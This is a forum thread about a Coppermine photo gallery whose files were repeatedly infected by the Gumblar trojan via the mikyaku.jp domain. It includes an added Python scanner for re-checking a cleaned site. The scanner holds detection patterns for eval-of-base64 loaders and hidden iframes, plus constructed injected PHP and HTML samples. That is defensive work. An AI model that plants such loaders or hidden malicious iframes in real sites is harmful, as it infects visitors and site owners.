Trojans on 1.4.25

Started by bjfs, October 25, 2009, 09:18:19 PM


bjfs

So I had a gallery (currently taken down) on 1.4.25 with register globals turned off and for some odd reason the PHP files got infected with this sinister code:

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


Which decodes to evaluation of some nasty site-wide infections of HTML, HTM and JS files with a link to a trojan in the mikyaku.jp domain.

The only mod I used was the captcha one. I tried many things, upgrading from 1.4.34 (wiping the whole code first, where only albums remain) and realising that the host had register globals on by default.

I'm tired of cleaning the site with global search and replace, re-installing and having the incident happen again after a week or two. Maybe 1.5 will be better  :P

There is no link because the gallery is dead.

phill104

Coppermine may not be the route the hackers got in. There are many methods. What other PHP-driven software do you have installed? Have you been a victim of an attack before and not fully cleaned up? Are you on a shared host where somebody else's site was the one at risk, but the scumbag managed access to the whole server? As you can see, it is very hard to see exactly where the problem occurred without more information.

If possible, get your host to check the server logs, as these should help track down where the leak was. If it can be shown that Coppermine was the point of entry, please post details here so we can look into it.
It is a mistake to think you can solve any major problems just with potatoes.

Joachim Müller

Sounds like the Trojan Gumblar in action on your site (I figured this out by searching for mikyaku.jp, which led to http://www.malwaredomainlist.com/update.php). While it's sad to hear that your site got infected, there is no saying how the attack was carried out, so you cannot (yet) blame Coppermine for being the weakness where the attacker got in.

Here are some articles on Gumblar:
To me it seems that the attack is carried out using FTP access. In other words: the attackers retrieved your FTP data (maybe it was trivial, or your PC is infected and you have subsequently fallen victim to a keylogger). Therefore, it was probably not a weakness in Coppermine that let the attacker in. Please be very careful when blaming people for providing buggy code, especially if you don't have the skills to judge.

Joachim
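The thread describes two things a site owner can act on: PHP, HTML and JS files that were overwritten with an obfuscated `eval` payload pointing at mikyaku.jp, and the advice above to look for the entry point rather than assume it was Coppermine. The script below is an added example (not Coppermine code and not from anyone in this thread) that walks a web root and flags files carrying that kind of injection, so a cleaned site can be re-checked on a schedule instead of by hand-editing. The indicator patterns, file extensions and constructed sample files are assumptions made for this example; the mikyaku.jp domain is the one named in the thread.

```python
import os
import re
import tempfile

# Indicators of the injection style described in the thread. These patterns
# are assumptions made for this example, not a signature set from any vendor.
INDICATORS = {
    # obfuscated PHP that is decoded and eval'd at runtime
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
        re.IGNORECASE,
    ),
    # an unusually long base64 run, typical of a packed payload
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
    # the Gumblar domain named in the thread
    "known_bad_domain": re.compile(r"mikyaku\.jp", re.IGNORECASE),
    # an iframe styled to be invisible, the usual way injected HTML loads the dropper
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none)",
        re.IGNORECASE,
    ),
}

# file types the thread reports as infected
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js"}


def scan_text(text):
    """Return the names of every indicator that matches the given file content."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def scan_tree(root):
    """Walk a web root and map each flagged file (relative path) to its indicators."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if os.path.splitext(filename)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, filename)
            with open(path, "r", encoding="utf-8", errors="replace") as handle:
                found = scan_text(handle.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def demo():
    """Build a constructed mini web root and scan it; returns the scan result."""
    # constructed sample content: a clean closure page, an injected PHP include,
    # and an album page with a hidden iframe. The base64 blob is filler, not a payload.
    clean_php = "<?php echo 'Gallery closed for maintenance'; ?>\n"
    injected_php = "<?php eval(base64_decode('" + "A" * 240 + "')); ?>\n"
    injected_html = (
        "<html><body><p>Album</p>"
        "<iframe src=\"http://mikyaku.jp/placeholder\" style=\"visibility:hidden\"></iframe>"
        "</body></html>\n"
    )
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "include"))
        os.makedirs(os.path.join(root, "albums"))
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write(clean_php)
        with open(os.path.join(root, "include", "init.inc.php"), "w") as f:
            f.write(injected_php)
        with open(os.path.join(root, "albums", "page.html"), "w") as f:
            f.write(injected_html)
        return scan_tree(root)


if __name__ == "__main__":
    for path, indicators in sorted(demo().items()):
        print(path, "->", ", ".join(indicators))
```

Run it against the real document root instead of the constructed one (`scan_tree("/path/to/htdocs")`) and diff the output between runs: a file that was clean yesterday and flagged today is the reinfection the thread complains about, and its modification time narrows down which FTP or web-server log lines to ask the host for. The `long_base64_blob` rule will also fire on legitimate inline data URIs, so treat it as a triage hint rather than proof; the `eval` and domain rules are the ones worth acting on immediately.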

bjfs

Right. So the only PHP file left was just outputting the service closure text, and a few hours later the malicious code was added to it again. Oh well, this is what you get for having a shared host and sharing an account with other people. Make lame rants about society with a death wish after one is out of ideas. OK, so I'm lame today. Happens ::)